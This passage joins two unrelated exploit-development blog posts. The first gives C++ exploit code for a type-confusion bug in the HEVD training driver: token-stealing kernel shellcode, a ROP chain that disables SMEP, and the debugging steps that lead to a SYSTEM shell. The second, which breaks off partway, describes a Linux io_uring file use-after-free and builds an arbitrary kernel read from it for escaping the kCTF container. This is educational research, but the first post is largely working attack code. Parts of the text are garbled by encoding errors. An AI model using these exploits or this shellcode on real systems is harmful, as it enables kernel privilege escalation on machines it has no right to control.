ULONG ioctlCode = 0x222023; //HEVD_IOCTL_TYPE_CONFUSION
BYTE sc[256] = {
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
// Allocating shellcode in a pre-defined address [0x80000000]
LPVOID shellcode = VirtualAlloc((LPVOID)0x80000000, sizeof(sc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlCopyMemory(shellcode, sc, 256);
// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
int index = 0;
LPVOID fakeStack = VirtualAlloc((LPVOID)0x48000000, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)SMEPBypass.STACK_PIVOT; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}
int main() {
SMEPBypassInitializer();
exploit();
return 0;
}
After exploit executes, we have the follow WinDBGoutput:
After mov esp, 0x48000000instruction execution, we notice that it crashed and returned a segmentation fault as an exception named UNEXPECTED_KERNEL_MODE_TRAP (7F), now letβs see ourΒ stack.
So, what can we doΒ next?
Memory and Components
Now this blogpost can really start. After all briefing covering the techniques, itβs time to explain why stack is one of the most confuse things in a exploitation development, we will see how it can easily turn a simple vulnerability attack into a brain-death issue.
Kernel Memory Management
Now, weβll have to go deep into Memory Managment topic as way to understand concepts about Memory Segments, Virtual Allocation, andΒ Paging.
According to Wikipedia
The kernel has full access to the systemβs memory and must allow processes to safely access this memory as they require it. Often the first step in doing this is virtual addressing, usually achieved by paging and/or segmentation. Virtual addressing allows the kernel to make a given physical address appear to be another address, the virtualΒ address.
<β¦snipβ¦>
In computing, a virtual address space (VAS) or address space is the set of ranges of virtual addresses that an operating system makes available to a process.[1] The range of virtual addresses usually starts at a low address and can extend to the highest address allowed by the computerβs instruction set architecture and supported by the operating systemβs pointer size implementation, which can be 4 bytes for 32-bit or 8 bytes for 64-bit OS versions. This provides several benefits, one of which is security through process isolation assuming each process is given a separate addressΒ space.
As we can see, Virtual Addressing refers to the space addressedfor each user-application and kernel functions, reserving memory spaces during a OS usage. When an application is initialized, the operation system understand that needs to allocate new space in memory, addressing into a valid range of addresses, consequently avoiding damaging kernel current memoryΒ region.
Thatβs the case when you try toplay a game, and for some reason, a bunch of GBβs from your current memory increasesbefore the game starts, all data was allocated and most of this dataand addresses initiates nullified until game file-data starts to be loaded intoΒ memory.
With the use of malloc() and VirtualAlloc() functions, you can actually βaddressβ a range of Virtual Memory into a defined address, thatβs why Stack Pivoting is the best solution for make this exploitΒ works.
Virtual Memory
As you can see in the above image, Virtual Addresses communicates to application/processby sending data and values, so the processes can be able to query, allocateor freeeach data anyΒ time.
As Wikipedia says:
In computing, virtual memory, or virtual storage,[b] is a memory management technique that provides an βidealized abstractionof the storage resources that are actually available on a given machineβ[3] which βcreates the illusionto users of a very large (main) memoryβ.[4]
The computerβs operating system, using a combination of hardwareand software, maps memory addresses used by a program, called virtual addresses, into physical addresses in computer memory. Main storage, as seen by a process or task, appears as a contiguous address space or collection of contiguous segments. The operating system manages virtual address spaces and the assignment of real memory to virtual memory.[5] Address translation hardware in the CPU, often referred to as a Memory Management Unit (MMU), automatically translates virtual addresses to physical addresses. Softwarewithin the operating system may extend these capabilities, utilizing, e.g., disk storage, to provide a virtual address space that can exceed the capacity of real memory and thus reference more memory than is physicallypresent in the computer.
The primary benefits of virtual memory include freeingapplications from having to manage a shared memory space, ability to share memory used by libraries betweenprocesses, increased security due to memory isolation, and being able to conceptually use more memory than might be physicallyavailable, using the technique of pagingor segmentation.
As mentioned before, addressing/allocating Virtual Memory ranges (from a user-land perspective), allow us to manipulate de usage of addresses data into our current application, but thatβs a problem. When an address range of Virtual Memory is allocated, still not part of OS physical operations due the abstracted/fake allocation into memory. Following the idea of our previous example, when a gamestarts, Virtual Memory is allocated and Memory Management Unit (MMU) automatically traslate data between physical and virtualaddresses.
From a developer perspective, when an application consumes memory, itβs important to free()/VirtualFree() unused data, to preventdata wonβt crashthe whole application, once so many addresses are set to be in use by the system. Also, OS can deal with processes which consumes many addresses, automatically closing this ones avoidingcritical errors. There cases that applications exceed the capacity of RAM free space, in this situations, the allocation can be extended into DiskΒ Storage.
Paged Memory
Physical memory also called Paged Memory, imply to memory which is in use by applications and processes. This memory scheme can retrivedata from Virtual Allocations, consequently utilizing it data as part of current execution.
According to Wikipedia:
Memory Paging
In computer operating systems, memory paging (or swappingon some Unix-like systems) is a memory management scheme by which a computer stores and retrieves data from secondary storage[a] for use in main memory.[citation needed] In this scheme, the operating system retrieves data from secondary storage in same-size blocks called pages. Pagingis an important part of virtual memory implementations in modern operating systems, using secondary storage to let programs exceed the size of available physicalΒ memory.
Page faults
When a process tries to reference a page not currently mapped to a page frame in RAM, the processor treats this invalid memory reference as a page fault and transfers control from the program to the operating system.
Page Table
A page table is the data structure used by a virtual memory system in a computer operating system tostore the mapping between virtual addresses and physical addresses. Virtual addresses are used by the program executed by the accessing process, while physical addresses are used by the hardware, or more specifically, by the Random-Access Memory (RAM) subsystem. The page table is a key component of virtual address translation that is necessary to access data inΒ memory.
Kernel can identifies when an address lies in a Paged Memoryspace by utilizing Page Table Entry (PTE)Β , which differs each type of allocation and mapping memory segments.
With Page Table Entry (PTE), Kernel is able to map the correct offset in order to translatedata between each address. If thereβs a invalid mapped memory region in the translations, a Page Fault is returned, and OS crashes. In case of Windows Kernel, a _KTRAP_FRAME is called, and an error should be expected asΒ bellow:
Virtual Allocation issues in WindowsΒ System
When a binary exploit is developed, memory must to be manipulate in most of the cases. Through C/C++ functions as VirtualAlloc(), if you manage to allocate data into address 0x48000000with size 0x1000, your current address 0x48000000are now βaddressedβ into Page Table as a Virtual Address until 0x48001000 and it will NOT be treat as part of Physical Memory by Kernel (remains as Non-Paged one). Itβs important to pay attention in this detail thus if you try to use the example above in a Kernel-Landperspective, a Trap Frame will be handled by WinDBGasΒ follows:
To deal with this issue, we can use VirtualLock()function from C/C++once it locks the specified region of the processβs virtual address space into physical memory, thus preveting Page Faults. So, with that in mind, we can now changes our Virtual Memory Addressto a Physicalone.
Now should be possible to achieve code execution, right?
<...snip...>
// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
int index = 0;
LPVOID fakeStack = VirtualAlloc((LPVOID)0x48000000, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
// Mapping address to Physical Memory <------------
if (VirtualLock(fakeStack, 0x10000)) {
std::cout << "[+] Address Mapped to Physical Memory" << std::endl;
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)SMEPBypass.STACK_PIVOT; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}
<...snip...>
Again, the same error popped out even with address mapped into PhysicalΒ Memory.
Pain and Suffer due DoubleFaults
After million of tests, with different patterns of memory allocations, iβve found a solution attempt. According to Martin Mielke and kristal-g, a reserved memory space should be used before the main allocation from address 0x48000000.
When a Trap Frameoccur, we can clearly notice that lower addresses from 0x48000000are used by stack, and if these addresses keeps with unallocated status, they canβt be used by current stackΒ frame.
As you can see, 0x47fffff70is being utilized by ourstack frame, but once we are starting the allocation from 0x48000000address, it wonβt be a valid one. To deal with this issue, a reservationmemory before 0x48000000 must beΒ done.
<...snip...>
LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000-0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
<...snip...>
Now we can actually allocate into 0x48000000β0x1000 address, finally allowing us to ignore DoubleFaultexception.
Letβs run our exploit again, it shouldΒ works!
No matter how you give a try to manage memory, changing addresses or fill up stackwith datahoping that works well, it will always catchand returns an exceptioneven when your code seems to be correct. it took me a while 3 monthsof rebooting my VM, and trying to change code to understand why it still happening.
Stack vsΒ DATA
Letβs imagine stack frame as a βbig ball pitβ, and there are located a bunch of data, and when a new ball is βplacedβ in this space, all the others βchangesβ their location. Thatβs exatcly what happens when you tries to manipulate memory, changing current stack to an another one as mov esp, 0x48000000 does. When a modification of current stack frame is done, the same βbelievesβ that current Physical Memory are mappedto another processes, and for some reason, you can actually see things like this afterΒ crash.
<...snip...>
LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000 - 0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Reserved memory before Stack Pivoting
*(INT64*)(0x48000000 - 0x1000) = 0xDEADBEEFDEADBEEF;
*(INT64*)(0x48000000 - 0x900) = 0xDEADBEEFDEADBEEF;
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
After pollute Stack Frame in a reserved space before Stack Pivoting offsetwe can cleary notice that different addresses poped out into our current Stack Frame, but our Trap Frame still remains the same as before 0x47fffe70. If we fill up all stack with 0x41bytes, weβll notice that some bytes will appear with different values asΒ below:
<...snip...>
// Filling up reserved space memory
RtlFillMemory((LPVOID)(0x48000000 - 0x1000), 0x1000, 'A');
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
With this results in mind, we have some alternatives to considerate for this situation:
- Increase size of reserved memoryspace.
- Try to find a fix to the Stack Frame due the situation we actually canβt reserve memory before Stack PivotingΒ space.
So, letβs give a try at first to increase the space of our reservedΒ memory
<...snip...>
// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000 - 0x5000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Filling up reserved space memory
// Size increased to 0x5000
RtlFillMemory((LPVOID)(0x48000000 - 0x5000), 0x5000, 'A');
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
For some reason, after increased our reserved memory before mov esp, 0x48000000, the whole kernel has crashed, and when 0x48000000is moved into our current RSPregister, our stack framechanges to the User Processes Contextdue the size of address it self. Thatβs why iβve mentioned before that stack seems to be a βBall pitβ sometimes, and after all, we still getting the same Trap Frame exception.
No matter how you try to manipulate memory, it always will be caught and it will crash some application, after that, WinDBGwill handle it as an exception and BSODyour system in a terrible horrorΒ movie.
Breakpoints??β¦. ooohh!β¦. Breakpoints!!!!
INT3, a.k.a 0xCCand breakpoints, can be defined as a signalfor any debbugerto catchand stop an execution of attached processesor a current development code. It can be performed by βclickingβ into a debug option in some part of an IDE UIor by insertingINT3instruction directly into target process through0xCC opcode. So, in a WinDBGcommand line, a command named bp still available to breakpointaddresses asΒ follow:
// Common Breakpoint, just stop into this address before it runs
bp 0x48000000
// Conditional Breakpoint, stop when r12 register is not equal to 1337
// if not equal, changes current r12 value to 0x1337
// if equal, changes r12 reg value with r13 one
bp 0x48000000 ".if( @r12 != 0x1337) { r12=1337 }.else { r12=r13 }"
etc...
Also, itβs possible to enjoy the use of this mechanism to breakpointa shellcode, and see if it code is running correctly during a exploitation development phase.
BYTE sc[256] = {
0xcc, // <--- We send a debbuger signal and stop it execution
// before code execution
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff
};
According to Wikipedia:
The INT3 instruction is a one-byte-instruction defined for use by debuggers to temporarily replacean instruction in a running program in order to set a code breakpoint. The more general INT XXh instructions are encoded using two bytes. This makes them unsuitable for use in patching instructions (which can be one byte long); seeΒ SIGTRAP.
The opcode for INT3 is 0xCC, as opposed to the opcode for INT immediate8, which is 0xCD immediate8. Since the dedicated 0xCC opcode has some desired special properties for debugging, which are not shared by the normal two-byte opcode for an INT3, assemblers do not normally generate the generic 0xCD 0x03 opcode from mnemonics.
After an explanation about breakpoints, itβs important to note that every previous tests are made withbreakpointsin order to develop our exploit, but itβs time to forget it and skip all INT3 instructions.
Letβs give a try to re-run our exploit without the needing of breakpointa thing.
Kernel wonβt crashes anymore, and system memory stillΒ intact!
Now shellcodeis being executed after our SMEPbypass through theROP chainand weβre now able to spawn a NT AUTHORITY\SYSTEMshell.
BAAAM!! Finally!!!! aNT AUTHORITY\SYSTEMshell afterΒ all!
Breakpointsβ¦. HAHA!! BREAKPOINTS!
So, now we can pay attention that breakpointsalso can be a dangerous thing into a exploitation development.
The explanation about this issue seems to be very simple. When WinDBG debbuger catchesan exceptionfrom kernel, Operation Systemgets a signal that something went wrong occurred, but when a Stack Manipulation is being doing, everythingthat you do is an exception. The Operation Systemdonβt understand that βan attacker is trying to manipulate Stackβ, he just catchand rebootit self because the Stackare different from your current kernelΒ context.
This headhache occurs likeStructured Exception Handling (SEH)vulnerabilities, once when the set of breakpointsand even a debbugerinto a process, can cause crashes or unitilizationof theΒ same.
In my case, a away to pass through exceptionis by ignoring all breakpoints, and let kernel donβt reboot with a Non-Criticalexception.
Final Considerations
With this blogpost, iβve learned alot of content that i didnβt knew before starting to write. It was a fun experience and extreme technical (specially for me), it took me 2 days to write about a thing which cost me 3 months long! you should probably had 10 minutes read, which is awesome and makes me happyΒ too!
Itβs important to note that most of this blogpost are deep explaining about memory itself, and trying to showing off how as an attacker is possible to improve our way to deal with troubles, looking around for all possibilities which can help us to achieve our goals, in that caseNT AUTHORITY\SYSTEM shell.
Beware of Stackand Breakpoints, this things can be a headache sometimes, and you will NEVER know until you think about changes your attack methodoly.
Thanks to the people who helped me along all thisΒ way:
- First of all, thanks to my husband who holded me on, when I got myself stressed, with no clue what to do, and with alot of nightmares along all thisΒ months!
- @xct_de
- @gal_kristal
- @33y0re
Hope youΒ enjoyed!
Exploit Link (not so important atΒ all)
References
- https://www.coresecurity.com/sites/default/files/2020-06/Windows%20SMEP%20bypass%20U%20equals%20S_0.pdf
- https://kristal-g.github.io/2021/02/20/HEVD_Type_Confusion_Windows_10_RS5_x64.html
- https://ctf101.org/binary-exploitation/return-oriented-programming/
- https://j00ru.vexillium.org/2011/06/smep-what-is-it-and-how-to-beat-it-on-windows/
- https://www.abatchy.com/2018/01/kernel-exploitation-4
- https://vulndev.io/2022/07/14/windows-kernel-exploitation-hevd-x64-use-after-free/
- https://h0mbre.github.io/HEVD_Stackoverflow_SMEP_Bypass_64bit/
- https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Driver/HEVD/Windows/TypeConfusion.c
Escaping the Google kCTF Container with a Data-Only Exploit
Introduction
Iβve been doing some Linux kernel exploit development/study and vulnerability research off and on since last Fall and a few months ago I had some downtime on vacation to sit and challenge myself to write my first data-only exploit for a real bug that was exploited in kCTF. io_ring
has been a popular target in the programβs history up to this point, so I thought Iβd find an easy-to-reason-about bug there that had already been exploited as fertile ground for exploit development creativity. The bug I chose to work with was one which resulted in a struct file
UAF where it was possible to hold an open file descriptor to the freed object. There have been quite a few write-ups on file
UAF exploits, so I decided as a challenge that my exploit had to be data-only. The parameters of the self-imposed challenge were completely arbitrary, but I just wanted to try writing an exploit that didnβt rely on hijacking control flow. I have written quite a few Linux kernel exploits of real kCTF bugs at this point, probably 5-6 as practice, just starting with the vulnerability and going from there, but all of them have ended up in me using ROP, so this was my first try at data-only. I also had not seen a data-only exploit for a struct file
UAF yet, which was encouraging as it seemed it was worthwile βresearchβ. Also, before we get too far, please do not message me to tell me that someone already did xyz years prior. Iβm very new to this type of thing and was just doing this as a personal challenge, if some aspects of the exploit are unoriginal, that is by coincidence. I will do my best to cite all my inspiration as we go.
The Bug
The bug is extremely simple (why canβt I find one like this?) and was exploited in kCTF in November of last year. I didnβt look very hard or ask around in the kCTF discord, but I was not able to find a PoC for this particular exploit. I was able to find several good write-ups of exploits leveraging similar vulnerabilities, especially this one by pqlpql and Awarau: https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/.
I wonβt go into the bug very much because it wasnβt really important to the excercise of being creative and writing a new kind of exploit (new for me); however, as you can tell from the patch, there was a call to put (decrease) a reference to a file without first checking if the file was a fixed file in the io_uring. There is this concept of fixed files which are managed by the io_uring itself, and there was this pattern throughout that codebase of doing checks on request files before putting them to ensure that they were not fixed files, and in this instance you can see that the check was not performed. So we are able from userspace to open a file (refcount == 1), register the file as a fixed file (recount == 2), call into the buggy code path by submitting an IORING_OP_MSG_RING
request which, upon completion will erroneously decrement the refcount (refcount == 1), and then finally, call io_uring_unregister_files
which ends up decrementing the recount to 0 and freeing the file while we still maintain an open file descriptor for it. This is about as good as bugs get. I need to find one of these.
What sort of variant analysis can we perform on this type of bug? Iβm not so sure, it seems to be a broad category. But the careful code reviewer might have noticed that everywhere else in the codebase when there was the potential of putting a request file, the authors made sure to check if the file was fixed or not. This file put forgot to perform the check. The broad lesson I learned from this was to try and find instances of an action being performed multiple times in a codebase and look for descrepancies between those routines.
Giant Shoulders
Itβs extremely important to stress that the blogpost I linked above from @pqlpql and @Awarau1 was very instrumental to this process. In that blogpost they broke-down in exquisite detail how to coerce the Linux kernel to free an entire page of file
objects back to the page allocator by utilizing a technique called βcross-cacheβ. file
structs have their own dedicated cache in the kernel and so typical object replacement shenanigans in UAF situations arenβt very useful in this instance, regardless of the struct file
size. Thanks to their blogpost, the concept of βcross-cacheβ has been used and discussed more and more, at least on Twitter from my anecdotal experience.
Instead of using this trick of getting our entire victim page of file
objects sent back to the page allocator only to have the page used as the backing for general cache objects, I elected to have the page reallocated in the form of the a pipe buffer. Please see this blogpost by @pqlpql for more information (this is a great writeup in general). This is an extremely powerful technique because we control all of the contents of the pipe buffer (via writes) and we can read 100% of the page contents (via reads). Itβs also extremely reliable in my expierence. Iβm not going to go into too much depth here because this wasnβt any of my doing, this is 100% the people mentioned thus far. Please go read the material from them.
Arbitrary Read
The first thing I started to look for, was a way to leak data, because Iβve been hardwired to think that all Linux kernel exploits follow the same pattern of achieving a leak which defeats KASLR, finding some valuable objects in memory, overwriting a function pointer blah blah blah. (Turns out this is not the case and some really talented people have really opened my mind in this area.) The only thing I knew for certain at this point was I have an open file descriptor at my disposal so letβs go looking around the file system code in the Linux kernel. One of the first things that caught my eye was the fcntl
syscall in fs/fcntl.c
. In general what I was doing at this point, was going through syscall tables for the Linux kernel and seeing which syscalls took an fd
as an argument. From there, I would visit the portion of the kernel codebase which handled that syscall implementation and I would ctrl-f
for the function copy_to_user
. This seemed like a relatively logical way to find a method of leaking data back to userspace.
The copy_to_user
function is a key part of the Linux kernelβs interface with user space. Itβs used to copy data from the kernelβs own memory space into the memory space of a user process. This function ensures that the copy is done safely, respecting the separation between user and kernel memory.
Now if you go to the source code and do the find on copy_to_user
, the 2nd result is a snippet in this bit right here:
static long fcntl_rw_hint(struct file *file, unsigned int cmd,
unsigned long arg)
{
struct inode *inode = file_inode(file);
u64 __user *argp = (u64 __user *)arg;
enum rw_hint hint;
u64 h;
switch (cmd) {
case F_GET_RW_HINT:
h = inode->i_write_hint;
if (copy_to_user(argp, &h, sizeof(*argp)))
return -EFAULT;
return 0;
case F_SET_RW_HINT:
if (copy_from_user(&h, argp, sizeof(h)))
return -EFAULT;
hint = (enum rw_hint) h;
if (!rw_hint_valid(hint))
return -EINVAL;
inode_lock(inode);
inode->i_write_hint = hint;
inode_unlock(inode);
return 0;
default:
return -EINVAL;
}
}
You can see that in the F_GET_RW_HINT
case, a u64
(βhβ), is copied back to userspace. That value comes from the value of inode->i_write_hint
. And inode
itself is returned from file_inode(file)
. The source code for that function is as follows:
static inline struct inode *file_inode(const struct file *f)
{
return f->f_inode;
}
Lol, well then. If we control the file
, then we control the inode
as well. A struct file
looks like this:
struct file {
union {
struct llist_node fu_llist;
struct rcu_head fu_rcuhead;
} f_u;
struct path f_path;
struct inode *f_inode; /* cached value */
<SNIP>
And since weβre using the pipe buffer as our replacement object (really the entire page), we can set inode
to be an arbitrary address. Letβs go check out the inode
struct and see what we can learn about this i_write_hint
member.
struct inode {
umode_t i_mode;
unsigned short i_opflags;
kuid_t i_uid;
kgid_t i_gid;
unsigned int i_flags;
#ifdef CONFIG_FS_POSIX_ACL
struct posix_acl *i_acl;
struct posix_acl *i_default_acl;
#endif
const struct inode_operations *i_op;
struct super_block *i_sb;
struct address_space *i_mapping;
#ifdef CONFIG_SECURITY
void *i_security;
#endif
/* Stat data, not accessed from path walking */
unsigned long i_ino;
/*
* Filesystems may only read i_nlink directly. They shall use the
* following functions for modification:
*
* (set|clear|inc|drop)_nlink
* inode_(inc|dec)_link_count
*/
union {
const unsigned int i_nlink;
unsigned int __i_nlink;
};
dev_t i_rdev;
loff_t i_size;
struct timespec64 i_atime;
struct timespec64 i_mtime;
struct timespec64 i_ctime;
spinlock_t i_lock; /* i_blocks, i_bytes, maybe i_size */
unsigned short i_bytes;
u8 i_blkbits;
u8 i_write_hint;
<SNIP>
So i_write_hint
is a u8
, aka, a single byte. This is perfect for what we need, inode
becomes the address from which we read a byte back to userland (plus the offset to the member).
Since we control 100% of the backing data of the file
, we thus control the value of the inode
member. So if we set up a fake file
struct in memory via our pipe buffer and have the inode
member be 0x1337
, the kernel will try to deref 0x1337
as an address and then read a byte at the offset of the i_write_hint
member. So this is an arbitrary read for us, and we found it in the dumbest way possible.
This was really encouraging for me that we found an arbitrary read gadget so quickly, but what should we aim the read at?
Finding a Read Target
So we can read data at any address we want, but we donβt know what to read. I struggled thinking about this for a while, but then remembered that the cpu_entry_area
was not randomized boot to boot, it is always at the same address. I knew this from the above blogpost about the file
UAF, but also vaguely from @ky1ebot tweets like this one.
cpu_entry_area
is a special per-CPU area in the kernel that is used to handle some types of interrupts and exceptions. There is this concept of Interrupt Stacks in the kernel that can be used in the event that an exception must be handled for instance.
After doing some debugging with GDB, I noticed that there was at least one kernel text pointer that showed up in the cpu_entry_area
consistently and that was an address inside the error_entry
function which is as follows:
SYM_CODE_START_LOCAL(error_entry)
UNWIND_HINT_FUNC
PUSH_AND_CLEAR_REGS save_ret=1
ENCODE_FRAME_POINTER 8
testb $3, CS+8(%rsp)
jz .Lerror_kernelspace
/*
* We entered from user mode or we're pretending to have entered
* from user mode due to an IRET fault.
*/
swapgs
FENCE_SWAPGS_USER_ENTRY
/* We have user CR3. Change to kernel CR3. */
SWITCH_TO_KERNEL_CR3 scratch_reg=%rax
IBRS_ENTER
UNTRAIN_RET
leaq 8(%rsp), %rdi /* arg0 = pt_regs pointer */
.Lerror_entry_from_usermode_after_swapgs:
/* Put us onto the real thread stack. */
call sync_regs
RET
<SNIP>
error_entry
